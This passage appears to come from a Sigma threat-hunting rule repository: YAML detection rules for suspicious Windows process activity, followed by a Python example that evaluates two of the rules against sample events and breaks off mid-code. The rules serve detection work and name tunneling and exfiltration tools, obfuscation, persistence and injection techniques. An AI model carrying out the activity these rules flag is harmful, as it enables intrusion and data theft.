    "content": "title: SC.EXE Query Execution\nid: 57712d7a-679c-4a41-a913-87e7175ae429\nstatus: test\ndescription: Detects execution of \"sc.exe\" to query information about registered services on the system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery\nauthor: frack113\ndate: 2021-12-06\nmodified: 2024-02-08\ntags:\n    - attack.discovery\n    - attack.t1007\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\sc.exe'\n        OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains: ' query'\n    filter_optional_keybase:\n        CommandLine: 'sc query dokan1'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate query of a service by an administrator to get more information such as the state or PID\n    - The Keybase process \"kbfsdokan.exe\" queries the dokan1 service with the following commandline \"sc query dokan1\"\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_schtasks_creation_from_susp_parent.yml",
    "content": "title: Scheduled Task Creation From Potential Suspicious Parent Location\nid: 9494479d-d994-40bf-a8b1-eea890237021\nstatus: test\ndescription: |\n    Detects the execution of \"schtasks.exe\" from a parent that is located in a potentially suspicious location.\n    Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.\nreferences:\n    - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-23\nmodified: 2024-05-13\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|contains:\n            - ':\\Temp\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Temporary Internet'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: '/Create '\n    filter_optional_common:\n        CommandLine|contains:\n            - 'update_task.xml'\n            - 'unattended.ini'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Software installers that run from temporary folders and also install scheduled tasks\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml",
    "content": "title: Potential CommandLine Obfuscation Using Unicode Characters\nid: e0552b19-5a83-4222-b141-b36184bb8d79\nrelated:\n    - id: 584bca0f-3608-4402-80fd-4075ff6072e3\n      type: similar\n    - id: ad691d92-15f2-4181-9aa4-723c74f9ddc3 # RTLO\n      type: similar\n    - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9\n      type: obsolete\nstatus: test\ndescription: |\n    Detects potential CommandLine obfuscation using unicode characters.\n    Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\nreferences:\n    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-01-15\nmodified: 2024-09-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # spacing modifier letters that get auto-replaced\n            - 'ˣ' # 0x02E3\n            - '˪' # 0x02EA\n            - 'ˢ' # 0x02E2\n            # Forward slash alternatives\n            - '∕' # 0x22FF\n            - '⁄' # 0x206F\n            # Hyphen alternatives\n            - '―' # 0x2015\n            - '—' # 0x2014\n            # Whitespace that don't work as path separator\n            - ' ' # 0x00A0\n            # Other\n            - '¯'\n            - '®'\n            - '¶'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_compression_params.yml",
    "content": "title: Potentially Suspicious Compression Tool Parameters\nid: 27a72a60-7e5e-47b1-9d17-909c9abafdcd\nstatus: test\ndescription: Detects potentially suspicious command line arguments of common data compression tools\nreferences:\n    - https://twitter.com/SBousseaden/status/1184067445612535811\nauthor: Florian Roth (Nextron Systems), Samir Bousseaden\ndate: 2019-10-15\nmodified: 2023-08-29\ntags:\n    - attack.collection\n    - attack.t1560.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - '7z*.exe'\n            - '*rar.exe'\n            - '*Command*Line*RAR*'\n        CommandLine|contains:\n            - ' -p'\n            - ' -ta'\n            - ' -tb'\n            - ' -sdel'\n            - ' -dw'\n            - ' -hp'\n    filter_main_generic:\n        ParentImage|contains:\n            - ':\\Program Files\\'\n            - ':\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_elevated_system_shell.yml",
    "content": "title: Elevated System Shell Spawned\nid: 61065c72-5d7d-44ef-bf41-6a36684b545f\nrelated:\n    - id: 178e615d-e666-498b-9630-9ed363038101\n      type: similar\nstatus: test\ndescription: |\n    Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.\nreferences:\n    - https://github.com/Wh04m1001/SysmonEoP\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-11-23\nmodified: 2025-03-06\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_shell:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\powershell_ise.exe'\n              - '\\pwsh.exe'\n              - '\\cmd.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'powershell_ise.EXE'\n              - 'pwsh.dll'\n              - 'Cmd.Exe'\n    selection_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        LogonId: '0x3e7'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_event_log_query.yml",
    "content": "title: EventLog Query Requests By Builtin Utilities\nid: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f\nrelated:\n    - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf\n      type: derived\nstatus: test\ndescription: |\n    Detects attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1\n    - http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\nauthor: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-20\nmodified: 2024-01-24\ntags:\n    - attack.t1552\n    - attack.credential-access\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_wmi:\n        CommandLine|contains|all:\n            - 'Select'\n            - 'Win32_NTLogEvent'\n    selection_wevtutil_img:\n        - Image|endswith: '\\wevtutil.exe'\n        - OriginalFileName: 'wevtutil.exe'\n    selection_wevtutil_cli:\n        CommandLine|contains:\n            - ' qe '\n            - ' query-events '\n    selection_wmic_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_wmic_cli:\n        CommandLine|contains: ' ntevent'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Get-WinEvent '\n            - 'get-eventlog '\n    condition: selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet\nfalsepositives:\n    - Legitimate log access by administrators or troubleshooting tools\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml",
    "content": "title: Potential Suspicious Execution From GUID Like Folder Names\nid: 90b63c33-2b97-4631-a011-ceb0f47b77c3\nstatus: test\ndescription: |\n    Detects potentially suspicious execution from a GUID-like folder name located in a suspicious location such as %TEMP%, as seen being used in IcedID attacks.\n    Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.\nreferences:\n    - https://twitter.com/Kostastsale/status/1565257924204986369\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-01\nmodified: 2023-03-02\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Uncomment this section and remove the filter if you want the rule to be more specific to processes\n    # selection_img:\n    #     Image|endswith:\n    #         - '\\rundll32.exe'\n    selection_folder:\n        CommandLine|contains:\n            # Add more suspicious or unexpected paths\n            - '\\AppData\\Roaming\\'\n            - '\\AppData\\Local\\Temp\\' # This could generate some FP with some installers creating folders with GUID\n    selection_guid:\n        CommandLine|contains|all:\n            - '\\{'\n            - '}\\'\n    filter_main_image_guid:\n        Image|contains|all:\n            - '\\{'\n            - '}\\'\n    filter_main_null:\n        Image: null\n    filter_main_driver_inst:  # DrvInst.exe \"4\" \"0\" \"C:\\Users\\venom\\AppData\\Local\\Temp\\{a0753cc2-fcea-4d49-a787-2290b564b06f}\\nvvhci.inf\" \"9\" \"43a2fa8e7\" \"00000000000001C0\" \"WinSta0\\Default\" \"00000000000001C4\" \"208\" \"c:\\program files\\nvidia corporation\\installer2\\nvvhci.{eb7b4460-7ec9-42d6-b73f-d487d4550526}\"\n        Image: 'C:\\Windows\\System32\\drvinst.exe'\n    filter_main_msiexec:\n        Image:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    condition: all of selection_* and not 1 of filter*\nfalsepositives:\n    - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml",
    "content": "title: Execution From Webserver Root Folder\nid: 35efb964-e6a5-47ad-bbcd-19661854018d\nstatus: test\ndescription: |\n    Detects a program executing from a web server root folder. Use this rule to hunt for potentially interesting activity such as webshells or backdoors\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-16\nmodified: 2024-01-18\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\wwwroot\\'\n            - '\\wmpub\\'\n            - '\\htdocs\\'\n    filter_main_generic:\n        Image|contains:\n            - 'bin\\'\n            - '\\Tools\\'\n            - '\\SMSComponent\\'\n        ParentImage|endswith: '\\services.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Various applications\n    - Tools that include ping or nslookup command invocations\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_exfil_and_tunneling_tool_execution.yml",
    "content": "title: Tunneling Tool Execution\nid: c75309a3-59f8-4a8d-9c2c-4c927ad50555\nstatus: test\ndescription: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.\nauthor: Daniil Yugoslavskiy, oscd.community\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\ndate: 2019-10-24\nmodified: 2024-01-18\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1041\n    - attack.t1572\n    - attack.t1071.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\httptunnel.exe'\n            - '\\plink.exe'\n            - '\\socat.exe'\n            - '\\stunnel.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administrators using one of these tools\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml",
    "content": "title: File or Folder Permissions Modifications\nid: 37ae075c-271b-459b-8d7b-55ad5f993dd8\nstatus: test\ndescription: Detects a file or folder's permissions being modified or tampered with.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)\n    - https://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-23\nmodified: 2023-11-21\ntags:\n    - attack.defense-evasion\n    - attack.t1222.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        Image|endswith:\n            - '\\cacls.exe'\n            - '\\icacls.exe'\n            - '\\net.exe' # \"grant\" Option available when used with \"net share\"\n            - '\\net1.exe' # \"grant\" Option available when used with \"net share\"\n        CommandLine|contains:\n            - '/grant'\n            - '/setowner'\n            - '/inheritance:r' # Remove all inherited ACEs\n    selection_2:\n        Image|endswith: '\\attrib.exe'\n        CommandLine|contains: '-r'\n    selection_3:\n        Image|endswith: '\\takeown.exe' # If this generates FP in your environment, comment it out or add more suspicious flags and locations\n    filter_optional_dynatrace_1:\n        CommandLine|endswith: 'ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\connectivity.history /reset'\n    filter_optional_dynatrace_2:\n        CommandLine|contains|all:\n            - 'ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\config.properties /grant :r '\n            - 'S-1-5-19:F'\n    filter_optional_vscode:\n        CommandLine|contains:\n            - '\\AppData\\Local\\Programs\\Microsoft VS Code'\n            - ':\\Program Files\\Microsoft VS Code'\n    filter_optional_avira:\n        CommandLine|contains:\n            - ':\\Program Files (x86)\\Avira'\n            - ':\\Program Files\\Avira'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Users interacting with the files on their own (unlikely unless privileged users).\n    - Dynatrace app\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml",
    "content": "title: Use Short Name Path in Command Line\nid: 349d891d-fef0-4fe4-bc53-eee623a15969\nrelated:\n    - id: a96970af-f126-420d-90e1-d37bf25e50e1\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.\n    Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.\n    When investigating, examine:\n    - Commands using short paths to access sensitive directories or files\n    - Web servers on Windows (especially Apache) where short filenames could bypass security controls\n    - Correlation with other suspicious behaviors\n    - Baseline short name usage in your environment and look for deviations\nreferences:\n    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\n    - https://twitter.com/frack113/status/1555830623633375232\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-08-07\nmodified: 2025-10-22\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '~1\\'\n            - '~2\\'\n    filter_main_system_process:\n        ParentImage:\n            - 'C:\\Windows\\System32\\Dism.exe'\n            - 'C:\\Windows\\System32\\cleanmgr.exe'\n    filter_main_winget:\n        - ParentImage|endswith: '\\winget.exe'\n        - ParentImage|contains: '\\AppData\\Local\\Temp\\WinGet\\'\n    filter_main_csc:\n        ParentImage|startswith: 'C:\\Windows\\Microsoft.NET\\Framework64\\v'\n        ParentImage|endswith: '\\csc.exe'\n    filter_main_installers:\n        - Image|contains|all:\n              - '\\AppData\\'\n              - '\\Temp\\'\n        - CommandLine|contains: '\\AppData\\Local\\Temp\\' # sometimes installers spawn other installers from temp folder\n    filter_optional_dopus:\n        ParentImage: 'C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe'\n    filter_optional_aurora:\n        ParentImage|endswith:\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n    filter_optional_thor:\n        ParentImage|endswith: '\\thor\\thor64.exe'\n    filter_optional_git:\n        CommandLine|contains:\n            - 'C:\\Program Files\\Git\\post-install.bat'\n            - 'C:\\Program Files\\Git\\cmd\\scalar.exe'\n    filter_optional_webex:\n        - ParentImage|endswith: '\\WebEx\\webexhost.exe'\n        - CommandLine|contains: '\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe'\n    filter_optional_veeam:\n        ParentImage|endswith: '\\veeam.backup.shell.exe'\n    filter_optional_everything:\n        ParentImage|endswith: '\\Everything\\Everything.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Applications could use this notation occasionally, which might generate some false positives. In that case investigate the parent and child process.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_open_html_file_from_download_folder.yml",
    "content": "title: HTML File Opened From Download Folder\nid: 538c5851-8c03-4724-8ec4-623bc7aadaea\nstatus: experimental\ndescription: |\n    Detects a web browser process opening an HTML file from a user's Downloads folder.\n    This behavior could be associated with phishing attacks where threat actors send HTML attachments to users.\n    When a user opens such an attachment, it can lead to the execution of malicious scripts or the download of malware.\n    During investigation, analyze the HTML file for embedded scripts or links, check for any subsequent downloads or process executions, and investigate the source of the email or message containing the attachment.\nreferences:\n    - https://app.any.run/tasks/ae3c4ded-fd6a-43ed-8215-ba0ba574ad33\n    - https://app.any.run/tasks/8901e2d5-0c5a-48ba-a8e9-10b5ed7e06f4\nauthor: Joseph Kamau\ndate: 2025-12-05\ntags:\n    - attack.t1598.002\n    - attack.t1566.001\n    - attack.initial-access\n    - attack.reconnaissance\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains|all:\n            - ':\\users\\'\n            - '\\Downloads\\'\n            - '.htm'\n    condition: selection\nfalsepositives:\n    - Opening any HTML file located in users' directories via a browser process will trigger this.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml",
    "content": "title: Potential Executable Run Itself As Sacrificial Process\nid: bafd07c6-3ea5-454a-b4be-058fbb073de7\nstatus: experimental\ndescription: |\n    Detects when an executable launches an identical instance of itself, a behavior often used to create a suspended “sacrificial” process for code injection or evasion.\n    Investigate for indicators such as the process being started in suspended mode, rapid parent termination, memory manipulation (e.g., WriteProcessMemory, CreateRemoteThread), or unsigned binaries.\n    Review command-line arguments, process ancestry, and network activity to confirm if this is legitimate behavior or process injection activity.\nreferences:\n    - https://www.joesandbox.com/analysis/1605063/0/html\nauthor: frack113\ndate: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|fieldref: ParentImage\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_main_original_fn:\n        OriginalFileName:\n            - 'Cmd.Exe'\n            - 'CompatTelRunner.exe'\n            - 'Discord.exe'\n            - 'electron.exe' # Vs Code\n            - 'EXPLORER.EXE'\n            - 'httpd.exe'\n            - 'IE4UINIT.EXE'\n            - 'mmc.exe'\n            - 'MpCmdRun.exe'\n            - 'mscorsvw.exe'\n            - 'msiexec.exe'\n            - 'NGenTask.exe'\n            - 'OneDriveSetup.exe'\n            - 'PowerShell.EXE'\n            - 'REGSVR32.EXE'\n            - 'smss.exe'\n            - 'Spotify.exe'\n            - 'WerMgr'\n    filter_main_product:\n        Product:\n            - 'Avira'\n            - 'Evernote'\n            - 'Firefox'\n            - 'Microsoft Office'\n            - 'Ninite'\n            - 'Opera Browser Assistant Installer'\n            - 'Opera Installer'\n            - 'Sysinternals Sysmon'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate software that may launch a new instance of itself, especially updaters or installers. Investigate each alert and apply whitelisting as needed.\n# Increase the level after some initial tuning in your environment\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_script_exec_from_compressed_parent.yml",
    "content": "title: Manual Execution of Script Inside of a Compressed File\nid: 95724fc1-a258-4674-97db-a30351981c5a\nstatus: test\ndescription: |\n    This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as the wscript and cscript binaries.\n\n    From the query below, the child process is the script interpreter that will execute the script. The script extensions are a set of standard extensions that the Windows OS recognizes. Selections 1-3 contain three different execution scenarios.\n        1. Compressed file opened using 7zip.\n        2. Compressed file opened using WinRar.\n        3. Compressed file opened using native Windows File Explorer capabilities.\n\n    When the malicious script is double-clicked, it will be extracted to the respective directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter.\nreferences:\n    - https://app.any.run/tasks/25970bb5-f864-4e9e-9e1b-cc8ff9e6386a\n    - https://app.any.run/tasks/fa99cedc-9d2f-4115-a08e-291429ce3692\nauthor: '@kostastsale'\ndate: 2023-02-15\nmodified: 2024-08-13\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_7zip:\n        ParentImage|endswith: '\\7z*.exe'\n        CommandLine|contains: '\\AppData\\local\\temp\\7z*\\'\n    selection_parent_winrar:\n        ParentImage|endswith: '\\winrar.exe'\n        CommandLine|contains: '\\AppData\\local\\temp\\rar*\\'\n    selection_parent_explorer:\n        ParentImage|endswith: '\\explorer.exe'\n        CommandLine|contains:\n            - '\\AppData\\local\\temp\\*.rar\\'\n            - '\\AppData\\local\\temp\\*.zip\\'\n    selection_child:\n        Image|endswith:\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        CommandLine|endswith:\n            - '.hta'\n            - '.js'\n            - '.jse'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n            - '.wsh'\n    condition: 1 of selection_parent_* and selection_child\nfalsepositives:\n    - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_taskkill_execution.yml",
    "content": "title: Process Terminated Via Taskkill\nid: 86085955-ea48-42a2-9dd3-85d4c36b167d\nstatus: test\ndescription: |\n    Detects execution of \"taskkill.exe\" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.\n    Attackers might leverage this in order to conduct data destruction or data encryption for impact on the data stores of services like Exchange and SQL Server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process\n    - https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\nauthor: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali\ndate: 2021-12-26\nmodified: 2024-10-06\ntags:\n    - attack.impact\n    - attack.t1489\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\taskkill.exe'\n        - OriginalFileName: 'taskkill.exe'\n    selection_cli_force:\n        - CommandLine|contains|windash: ' /f '\n        - CommandLine|endswith|windash: ' /f'\n    selection_cli_filter_process:\n        CommandLine|contains|windash:\n            - ' /im '\n            - ' /pid '\n    filter_main_installers:\n        ParentImage|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - ':\\Windows\\Temp'\n        ParentImage|endswith: '.tmp'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Expected FPs from some processes that use this technique to terminate one of their own processes during installations and updates\nlevel: low\n"
  },
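The two process_creation rules above (the self-spawn rule with its `fieldref` modifier and the taskkill rule with `windash`) are easiest to understand by running them over events. The block below is an added example, not code from the Sigma project or from pySigma: it implements only the handful of modifiers those rules use (startswith, contains, endswith, all, fieldref, windash) with Sigma's case-insensitive string matching, copies the two rules into Python dicts with the long filter lists abbreviated, and evaluates them against constructed events whose field names follow the process_creation schema the rules use.

```python
"""Added example (not Sigma project or pySigma code): evaluate the self-spawn rule
and the taskkill rule against constructed process_creation events, using a tiny
subset of Sigma semantics. Supported modifiers: startswith, contains, endswith,
all, fieldref, windash. String matching is case-insensitive, as Sigma requires."""

# windash: a '/' switch in a rule value also matches '-', en dash and em dash.
_DASHES = ("/", "-", "\u2013", "\u2014")


def _candidates(value, windash):
    """Expand one rule value into the variants the windash modifier allows."""
    return [value.replace("/", d) for d in _DASHES] if windash else [value]


def _match_field(event, spec, rule_value):
    """spec is 'Field' or 'Field|mod|mod'; a list value is OR (AND with 'all')."""
    field, *mods = spec.split("|")
    actual = event.get(field)
    if actual is None:
        return False
    actual = str(actual).lower()
    ops = {"startswith": actual.startswith, "endswith": actual.endswith,
           "contains": actual.__contains__}
    op = next((ops[m] for m in mods if m in ops), actual.__eq__)
    results = []
    for value in rule_value if isinstance(rule_value, list) else [rule_value]:
        if "fieldref" in mods:  # compare with another field of the same event
            other = event.get(value)
            results.append(other is not None and str(other).lower() == actual)
        else:
            results.append(any(op(c) for c in _candidates(str(value).lower(), "windash" in mods)))
    return all(results) if "all" in mods else any(results)


def _match_selection(event, selection):
    """A dict is AND over its fields; a list of dicts is OR over the dicts."""
    if isinstance(selection, list):
        return any(_match_selection(event, s) for s in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())


def _named(rule, prefix):
    return [v for k, v in rule.items() if k.startswith(prefix)]


# 'Potential Executable Run Itself As Sacrificial Process' (filter lists shortened).
SACRIFICIAL = {
    "selection": {"Image|fieldref": "ParentImage"},
    "filter_main_path": {"Image|startswith": ["C:\\Program Files\\", "C:\\Program Files (x86)\\"]},
    "filter_main_original_fn": {"OriginalFileName": ["Cmd.Exe", "EXPLORER.EXE", "msiexec.exe"]},
    "filter_main_product": {"Product": ["Firefox", "Microsoft Office", "Sysinternals Sysmon"]},
}

# 'Process Terminated Via Taskkill'.
TASKKILL = {
    "selection_img": [{"Image|endswith": "\\taskkill.exe"}, {"OriginalFileName": "taskkill.exe"}],
    "selection_cli_force": [{"CommandLine|contains|windash": " /f "},
                            {"CommandLine|endswith|windash": " /f"}],
    "selection_cli_filter_process": {"CommandLine|contains|windash": [" /im ", " /pid "]},
    "filter_main_installers": {"ParentImage|contains": ["\\AppData\\Local\\Temp\\", ":\\Windows\\Temp"],
                               "ParentImage|endswith": ".tmp"},
}


def sacrificial_process_hit(event):
    """condition: selection and not 1 of filter_*"""
    return _match_selection(event, SACRIFICIAL["selection"]) and not any(
        _match_selection(event, f) for f in _named(SACRIFICIAL, "filter_"))


def taskkill_hit(event):
    """condition: all of selection_* and not 1 of filter_main_*"""
    return all(_match_selection(event, s) for s in _named(TASKKILL, "selection_")) and not any(
        _match_selection(event, f) for f in _named(TASKKILL, "filter_main_"))


# Constructed sample events, not real telemetry.
EVENTS = [
    {"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe",  # 0: dropper relaunches itself
     "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe",
     "OriginalFileName": "update.exe", "Product": "-", "CommandLine": "update.exe"},
    {"Image": "C:\\Program Files\\Acme\\acme.exe",  # 1: installed software, dropped by the path filter
     "ParentImage": "C:\\Program Files\\Acme\\acme.exe",
     "OriginalFileName": "acme.exe", "Product": "Acme Suite", "CommandLine": "acme.exe --child"},
    {"Image": "D:\\portable\\firefox\\firefox.exe",  # 2: portable browser, dropped by the Product filter
     "ParentImage": "D:\\portable\\firefox\\firefox.exe",
     "OriginalFileName": "firefox.exe", "Product": "Firefox", "CommandLine": "firefox.exe -contentproc"},
    {"Image": "C:\\Windows\\System32\\taskkill.exe",  # 3: dash switches, still caught thanks to windash
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "taskkill.exe",
     "CommandLine": "taskkill -f -im sqlservr.exe"},
    {"Image": "C:\\Windows\\System32\\taskkill.exe",  # 4: installer .tmp parent, dropped by the filter
     "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Temp\\is-K3P2Q.tmp\\setup.tmp",
     "OriginalFileName": "taskkill.exe", "CommandLine": "taskkill /F /IM agent.exe"},
    {"Image": "C:\\Windows\\System32\\taskkill.exe",  # 5: no force switch, no hit
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "taskkill.exe",
     "CommandLine": "taskkill /im notepad.exe"},
]

RULES = {"sacrificial": sacrificial_process_hit, "taskkill": taskkill_hit}


def evaluate(events=EVENTS):
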